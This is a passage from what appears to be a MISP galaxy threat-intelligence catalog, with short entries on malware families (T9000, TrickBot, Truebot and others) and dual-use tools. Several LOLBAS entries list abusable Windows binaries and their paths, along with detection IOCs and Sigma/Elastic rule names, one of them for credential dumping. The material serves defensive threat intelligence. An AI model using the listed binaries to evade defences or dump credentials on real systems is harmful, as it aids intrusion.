UUID 148d587c-3b1e-4e71-bdfb-8c37005e7e77 which can be used as unique global reference for SysUpdate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'Windows']
software_attack_id S0663
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

T9000

T9000 is a backdoor that is a newer variant of the T5000 malware family, also known as Plat1. Its primary function is to gather information about the victim. It has been used in multiple targeted attacks against U.S.-based organizations. [FireEye admin@338 March 2014] [Palo Alto T9000 Feb 2016]

Internal MISP references

UUID c5647cc4-0d46-4a41-8591-9179737747a2 which can be used as unique global reference for T9000 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0098
source MITRE
type ['malware']

Tactical RMM

According to joint Cybersecurity Advisory AA23-320A (November 2023), Tactical RMM is a publicly available, legitimate tool that "enables remote monitoring and management of systems". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.[U.S. CISA Scattered Spider November 16 2023]

Internal MISP references

UUID ba4777f9-bb3b-4143-8062-a510c30544ce which can be used as unique global reference for Tactical RMM in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5066
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236']
type ['tool']
Related clusters

To see the related clusters, click here.

Taidoor

Taidoor is a remote access trojan (RAT) that has been used by Chinese government cyber actors to maintain access on victim networks.[CISA MAR-10292089-1.v2 TAIDOOR August 2021] Taidoor has primarily been used against Taiwanese government organizations since at least 2010.[TrendMicro Taidoor]

Internal MISP references

UUID 9334df79-9023-44bb-bc28-16c1f07b836b which can be used as unique global reference for Taidoor in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0011
source MITRE
type ['malware']

Tailscale

According to joint Cybersecurity Advisory AA23-320A (November 2023), Tailscale is a publicly available, legitimate tool that "provides virtual private networks (VPNs) to secure network communications". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.[U.S. CISA Scattered Spider November 16 2023]

Internal MISP references

UUID 130a5491-1b93-45fd-bd72-9e5f8ddeba2a which can be used as unique global reference for Tailscale in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5069
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236']
type ['tool']
Related clusters

To see the related clusters, click here.

TAINTEDSCRIBE

TAINTEDSCRIBE is a fully-featured beaconing implant integrated with command modules used by Lazarus Group. It was first reported in May 2020.[CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020]

Internal MISP references

UUID 1548c94a-fb4d-43d8-9956-ea26f5cc552f which can be used as unique global reference for TAINTEDSCRIBE in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0586
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

TajMahal

TajMahal is a multifunctional spying framework that has been in use since at least 2014. TajMahal is comprised of two separate packages, named Tokyo and Yokohama, and can deploy up to 80 plugins.[Kaspersky TajMahal April 2019]

Internal MISP references

UUID b1b7a8d9-6df3-4e89-8622-a6eea3da729b which can be used as unique global reference for TajMahal in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0467
source MITRE
type ['malware']

Tar

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used by Windows to extract and create archives.

Author: Brian Lucero

Paths: * C:\Windows\System32\tar.exe

Resources: * https://twitter.com/Cyber_Sorcery/status/1619819249886969856

Detection: * IOC: tar.exe extracting files from a remote host within the environment[Tar.exe - LOLBAS Project]

Internal MISP references

UUID 65e149a8-7c78-40d0-9cc5-9f420011facc which can be used as unique global reference for Tar in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5167
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Tarrask

Tarrask is malware that has been used by HAFNIUM since at least August 2021. Tarrask was designed to evade digital defenses and maintain persistence by generating concealed scheduled tasks.[Tarrask scheduled task]

Internal MISP references

UUID 7bb9d181-4405-4938-bafb-b13cc98b6cd8 which can be used as unique global reference for Tarrask in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1011
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Tasklist

The Tasklist utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. [Microsoft Tasklist]

Internal MISP references

UUID abae8f19-9497-4a71-82b6-ae6edd26ad98 which can be used as unique global reference for Tasklist in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0057
source MITRE
tags ['758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

tcpdump

tcpdump is an open-source network packet analyzer utility run from the command line.

Internal MISP references

UUID 7a5d457c-949c-4e8f-817a-7e2d33f6c618 which can be used as unique global reference for tcpdump in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Linux', 'macOS', 'Windows']
software_attack_id S5267
source Tidal Cyber
tags ['02495172-1563-48e7-8ac2-98463bd85e9d', '6070668f-1cbd-4878-8066-c636d1d8659c', 'd8f7e071-fbfd-46f8-b431-e241bb1513ac', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'cd1b5d44-226e-4405-8985-800492cf2865']
type ['tool']

TDSSKiller

TDSSKiller is a tool used to remove rootkits.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID c62b061a-b4d0-4b28-932c-3c9423443248 which can be used as unique global reference for TDSSKiller in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5044
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

TDTESS

TDTESS is a 64-bit .NET binary backdoor used by CopyKittens. [ClearSky Wilted Tulip July 2017]

Internal MISP references

UUID e7116740-fe7c-45e2-b98d-0c594a7dff2f which can be used as unique global reference for TDTESS in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0164
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

te

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Testing tool included with Microsoft Test Authoring and Execution Framework (TAEF).

Author: Oddvar Moe

Paths: * no default

Resources: * https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg

Detection: * Sigma: proc_creation_win_susp_use_of_te_bin.yml[te.exe - LOLBAS Project]

Internal MISP references

UUID 8eef4e4b-e294-47bb-befa-9cd97ceced57 which can be used as unique global reference for te in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5239
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Teams

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Electron runtime binary which runs the Teams application

Author: Andrew Kisliakov

Paths: * %LOCALAPPDATA%\Microsoft\Teams\current\Teams.exe

Resources: * https://l--k.uk/2022/01/16/microsoft-teams-and-other-electron-apps-as-lolbins/

Detection:
* IOC: %LOCALAPPDATA%\Microsoft\Teams\current\app directory created
* IOC: %LOCALAPPDATA%\Microsoft\Teams\current\app.asar file created/modified by non-Teams installer/updater
* Sigma: proc_creation_win_susp_electron_exeuction_proxy.yml[Teams.exe - LOLBAS Project]

Internal MISP references

UUID 13221a7b-6c23-48a7-97bd-21e2c689a391 which can be used as unique global reference for Teams in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5240
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

TeamViewer

TeamViewer is a tool used to enable remote connections to network devices for support and administration.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID 6b5f6eb4-4cdd-4383-8623-d1f7de486865 which can be used as unique global reference for TeamViewer in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5010
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236']
type ['tool']
Related clusters

To see the related clusters, click here.

TEARDROP

TEARDROP is a memory-only dropper that was discovered on some victim machines during investigations related to the SolarWinds Compromise. It was likely used by APT29 since at least May 2020.[FireEye SUNBURST Backdoor December 2020][Microsoft Deep Dive Solorigate January 2021]

Internal MISP references

UUID bae20f59-469c-451c-b4ca-70a9a04a1574 which can be used as unique global reference for TEARDROP in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0560
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

Teleport

Teleport is a custom tool for data exfiltration. It has been observed in use during intrusions involving Truebot, a botnet and loader malware, in 2022 and 2023.[U.S. CISA Increased Truebot Activity July 6 2023]

Internal MISP references

UUID b9a98499-c984-4199-ae64-d1381ebbaa1f which can be used as unique global reference for Teleport in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5011
source Tidal Cyber
tags ['1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '8bf128ad-288b-41bc-904f-093f4fdde745']
type ['malware']

Terminator

Terminator is an open-source software package that is designed to facilitate disabling of endpoint security/antivirus tools by abusing the zam64.sys driver.[GitHub Terminator]

Internal MISP references

UUID 5cd0db7a-d47d-479b-89ac-9e78dfc0cd9d which can be used as unique global reference for Terminator in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5283
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb']
type ['tool']
Related clusters

To see the related clusters, click here.

TestWindowRemoteAgent

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: TestWindowRemoteAgent.exe is the command-line tool to establish RPC

Author: Onat Uzunyayla

Paths: * C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\RemoteAgent\TestWindowRemoteAgent.exe

Resources: None Provided

Detection: * IOC: TestWindowRemoteAgent.exe spawning unexpectedly[TestWindowRemoteAgent.exe - LOLBAS Project]

Internal MISP references

UUID 2143f749-d7b8-43c0-8041-8aeb486142c2 which can be used as unique global reference for TestWindowRemoteAgent in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5241
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

TEXTMATE

TEXTMATE is a second-stage PowerShell backdoor that is memory-resident. It was observed being used along with POWERSOURCE in February 2017. [FireEye FIN7 March 2017]

Internal MISP references

UUID 49d0ae81-d51b-4534-b1e0-08371a47ef79 which can be used as unique global reference for TEXTMATE in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0146
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

ThiefQuest

ThiefQuest is a virus, data stealer, and wiper that presents itself as ransomware targeting macOS systems. ThiefQuest was first seen in 2020 distributed via trojanized pirated versions of popular macOS software on Russian forums sharing torrent links.[Reed thiefquest fake ransom] Even though ThiefQuest presents itself as ransomware, since the dynamically generated encryption key is never sent to the attacker it may be more appropriately thought of as a form of wiper malware.[wardle evilquest partii][reed thiefquest ransomware analysis]

Internal MISP references

UUID 2ed5f691-68eb-49dd-b730-793dc8a7d134 which can be used as unique global reference for ThiefQuest in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
software_attack_id S0595
source MITRE
tags ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2e621fc5-dea4-4cb9-987e-305845986cd3']
type ['malware']

ThreatNeedle

ThreatNeedle is a backdoor that has been used by Lazarus Group since at least 2019 to target cryptocurrency, defense, and mobile gaming organizations. It is considered to be an advanced cluster of Lazarus Group's Manuscrypt (a.k.a. NukeSped) malware family.[Kaspersky ThreatNeedle Feb 2021]

Internal MISP references

UUID b31c7b8e-dbdd-4ad5-802e-dcdc72b7462e which can be used as unique global reference for ThreatNeedle in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0665
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

ThunderShell

ThunderShell is a tool used to facilitate remote access via HTTP requests.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID 8fe38eda-30be-4c88-ae76-ac6ebc89d66b which can be used as unique global reference for ThunderShell in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5045
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'be319849-fb2c-4b5f-8055-0bde562c280b', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

TightVNC

According to its project page, TightVNC is a free and open-source remote desktop software tool that is Virtual Network Computing (VNC)-compatible. It is designed to enable remote access to other systems.[TightVNC Software Project Page]

Internal MISP references

UUID 6b0d5be9-5305-4b45-bed9-43dee66b85e8 which can be used as unique global reference for TightVNC in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Linux', 'macOS', 'Windows']
software_attack_id S5015
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236']
type ['tool']
Related clusters

To see the related clusters, click here.

TinyTurla

TinyTurla is a backdoor that has been used by Turla against targets in the US, Germany, and Afghanistan since at least 2020.[Talos TinyTurla September 2021]

Internal MISP references

UUID 39f0371c-b755-4655-a97e-82a572f2fae4 which can be used as unique global reference for TinyTurla in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0668
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

TINYTYPHON

TINYTYPHON is a backdoor that has been used by the actors responsible for the MONSOON campaign. The majority of its code was reportedly taken from the MyDoom worm. [Forcepoint Monsoon]

Internal MISP references

UUID 0e009cb8-848e-427a-9581-d3a4fd9f6a87 which can be used as unique global reference for TINYTYPHON in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0131
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

TinyZBot

TinyZBot is a bot written in C# that was developed by Cleaver. [Cylance Cleaver]

Internal MISP references

UUID 277290fe-51f3-4822-bb46-8b69fd1c8ae5 which can be used as unique global reference for TinyZBot in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0004
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Tomiris

Tomiris is a backdoor written in Go that continuously queries its C2 server for executables to download and execute on a victim system. It was first reported in September 2021 during an investigation of a successful DNS hijacking campaign against a Commonwealth of Independent States (CIS) member. Security researchers assess there are similarities between Tomiris and GoldMax.[Kaspersky Tomiris Sep 2021]

Internal MISP references

UUID eff417ad-c775-4a95-9f36-a1b5a675ba82 which can be used as unique global reference for Tomiris in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0671
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']

Tor

Tor is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. Tor utilizes "Onion Routing," in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. [Dingledine Tor The Second-Generation Onion Router]

Internal MISP references

UUID 8c70d85b-b06d-423c-8bab-ecff18f332d6 which can be used as unique global reference for Tor in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS', 'Linux', 'Windows']
software_attack_id S0183
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'be319849-fb2c-4b5f-8055-0bde562c280b', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Torisma

Torisma is a second stage implant designed for specialized monitoring that has been used by Lazarus Group. Torisma was discovered during an investigation into the 2020 Operation North Star campaign that targeted the defense sector.[McAfee Lazarus Nov 2020]

Internal MISP references

UUID 4bce135b-91ba-45ae-88f9-09e01f983a74 which can be used as unique global reference for Torisma in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0678
source MITRE
type ['malware']

Tracker

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Tool included with Microsoft .Net Framework.

Author: Oddvar Moe

Paths: * no default

Resources: * https://twitter.com/subTee/status/793151392185589760 * https://attack.mitre.org/wiki/Execution

Detection: * Sigma: proc_creation_win_lolbin_tracker.yml[LOLBAS Tracker]

Internal MISP references

UUID 62ebde4b-4936-49f6-842b-8c0313ea26f5 which can be used as unique global reference for Tracker in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5242
source Tidal Cyber
tags ['3c9b26cf-9bda-4feb-ab42-ef7865cc80fd', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

TrailBlazer

TrailBlazer is a modular malware that has been used by APT29 since at least 2019.[CrowdStrike StellarParticle January 2022]

Internal MISP references

UUID 7a6ae9f8-5f8b-4e94-8716-d8ee82027197 which can be used as unique global reference for TrailBlazer in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0682
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

TrickBot

TrickBot is a Trojan spyware program written in C++ that first emerged in September 2016 as a possible successor to Dyre. TrickBot was developed and initially used by Wizard Spider for targeting banking sites in North America, Australia, and throughout Europe; it has since been used against all sectors worldwide as part of "big game hunting" ransomware campaigns.[S2 Grupo TrickBot June 2017][Fidelis TrickBot Oct 2016][IBM TrickBot Nov 2016][CrowdStrike Wizard Spider October 2020]

Internal MISP references

UUID c2bd4213-fc7b-474f-b5a0-28145b07c51d which can be used as unique global reference for TrickBot in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0266
source MITRE
tags ['e809d252-12cc-494d-94f5-954c49eb87ce']
type ['malware']
Related clusters

To see the related clusters, click here.

Trojan.Karagany

Trojan.Karagany is a modular remote access tool used for reconnaissance and linked to Dragonfly. The source code for Trojan.Karagany originated from the Dream Loader malware, which was leaked in 2010 and sold on underground forums. [Symantec Dragonfly][Secureworks Karagany July 2019][Dragos DYMALLOY]

Internal MISP references

UUID b88c4891-40da-4832-ba42-6c6acd455bd1 which can be used as unique global reference for Trojan.Karagany in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0094
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Trojan.Mebromi

Trojan.Mebromi is BIOS-level malware that takes control of the victim system before the Master Boot Record (MBR) is executed. [Ge 2011]

Internal MISP references

UUID f8a4213d-633b-4e3d-8e59-a769e852b93b which can be used as unique global reference for Trojan.Mebromi in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0001
source MITRE
type ['malware']

Truebot

Truebot is a botnet often used as a loader for other malware. In July 2023, U.S. authorities released joint Cybersecurity Advisory AA23-187A, which detailed increased observations of new Truebot variants infecting organizations in the United States and Canada. Authorities assessed that Truebot infections are primarily motivated around collection and exfiltration of sensitive victim data for financial gain. Officials also assessed that actors were using both spearphishing emails containing malicious hyperlinks and exploitation of CVE-2022-31199 (a vulnerability in the IT auditing application Netwrix Auditor) to deliver Truebot during these attacks. Additional tools associated with the attacks included Raspberry Robin for initial infections; FlawedGrace and Cobalt Strike for various post-exploitation activities; and Teleport, a custom tool for data exfiltration.[U.S. CISA Increased Truebot Activity July 6 2023]

Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/win.silence

Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/truebot/

PulseDive (IOCs): https://pulsedive.com/threat/Truebot

Internal MISP references

UUID 669f8b7a-2404-47ab-843d-e63431faafec which can be used as unique global reference for Truebot in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5000
source Tidal Cyber
tags ['1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', 'a98d7a43-f227-478e-81de-e7299639a355', '992bdd33-4a47-495d-883a-58010a2f0efb', '84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

Truvasys

Truvasys is first-stage malware that has been used by PROMETHIUM. It is a collection of modules written in the Delphi programming language. [Microsoft Win Defender Truvasys Sep 2017] [Microsoft NEODYMIUM Dec 2016] [Microsoft SIR Vol 21]

Internal MISP references

UUID 50844dba-8999-42ba-ba29-511e3faf4bc3 which can be used as unique global reference for Truvasys in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0178
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

TSCookie

TSCookie is a remote access tool (RAT) that has been used by BlackTech in campaigns against Japanese targets.[JPCert TSCookie March 2018][JPCert BlackTech Malware September 2019] TSCookie has been referred to as PLEAD, though more recent reporting indicates a separation between the two.[JPCert PLEAD Downloader June 2018][JPCert BlackTech Malware September 2019]

Internal MISP references

UUID 9872ab5a-c76e-4404-91f9-5b745722443b which can be used as unique global reference for TSCookie in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0436
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

TShark

TShark is a network protocol analyzer utility.

Internal MISP references

UUID 57f9458f-4dad-411e-9971-8e3e166f173b which can be used as unique global reference for TShark in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Linux', 'macOS', 'Windows']
software_attack_id S5268
source Tidal Cyber
tags ['e1be4b53-7524-4e88-bf6d-358cfdf96772', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'cd1b5d44-226e-4405-8985-800492cf2865']
type ['tool']

Ttdinject

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)

Author: Maxime Nadeau

Paths: * C:\Windows\System32\ttdinject.exe * C:\Windows\Syswow64\ttdinject.exe

Resources: * https://twitter.com/Oddvarmoe/status/1196333160470138880

Detection:
* Sigma: create_remote_thread_win_ttdinjec.yml
* Sigma: proc_creation_win_lolbin_ttdinject.yml
* IOC: Parent child relationship. Ttdinject.exe parent for executed command
* IOC: Multiple queries made to the IFEO registry key of an untrusted executable (Ex. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\payload.exe") from the ttdinject.exe process[Ttdinject.exe - LOLBAS Project]

Internal MISP references

UUID 7bd9859e-4260-4c86-903b-1f8bcf658da1 which can be used as unique global reference for Ttdinject in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5168
source Tidal Cyber
tags ['fc67aea7-f207-4cf5-8413-e33c76538cf6', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Tttracer

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used by Windows 1809 and newer to Debug Time Travel

Author: Oddvar Moe

Paths: * C:\Windows\System32\tttracer.exe * C:\Windows\SysWOW64\tttracer.exe

Resources:
* https://twitter.com/oulusoyum/status/1191329746069655553
* https://twitter.com/mattifestation/status/1196390321783025666
* https://lists.samba.org/archive/cifs-protocol/2016-April/002877.html

Detection:
* Sigma: proc_creation_win_lolbin_tttracer_mod_load.yml
* Sigma: image_load_tttracer_mod_load.yml
* Elastic: credential_access_cmdline_dump_tool.toml
* IOC: Parent-child relationship: tttracer.exe as the parent of the executed command[Tttracer.exe - LOLBAS Project]

Internal MISP references

UUID ab06ccb0-21c7-4d84-99ff-3349ce476910 which can be used as unique global reference for Tttracer in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5169
source Tidal Cyber
tags ['3c4e3160-4e82-49ce-b6a3-17879dd4b83c', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Turian

Turian is a backdoor that has been used by BackdoorDiplomacy to target Ministries of Foreign Affairs, telecommunication companies, and charities in Africa, Europe, the Middle East, and Asia. First reported in 2021, Turian is likely related to Quarian, an older backdoor that was last observed being used in 2013 against diplomatic targets in Syria and the United States.[ESET BackdoorDiplomacy Jun 2021]

Internal MISP references

UUID 571a45a7-68c9-452c-99bf-1d5b5fdd08b3 which can be used as unique global reference for Turian in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'Windows']
software_attack_id S0647
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

TURNEDUP

TURNEDUP is a non-public backdoor. It has been dropped by APT33's StoneDrill malware. [FireEye APT33 Sept 2017] [FireEye APT33 Webinar Sept 2017]

Internal MISP references

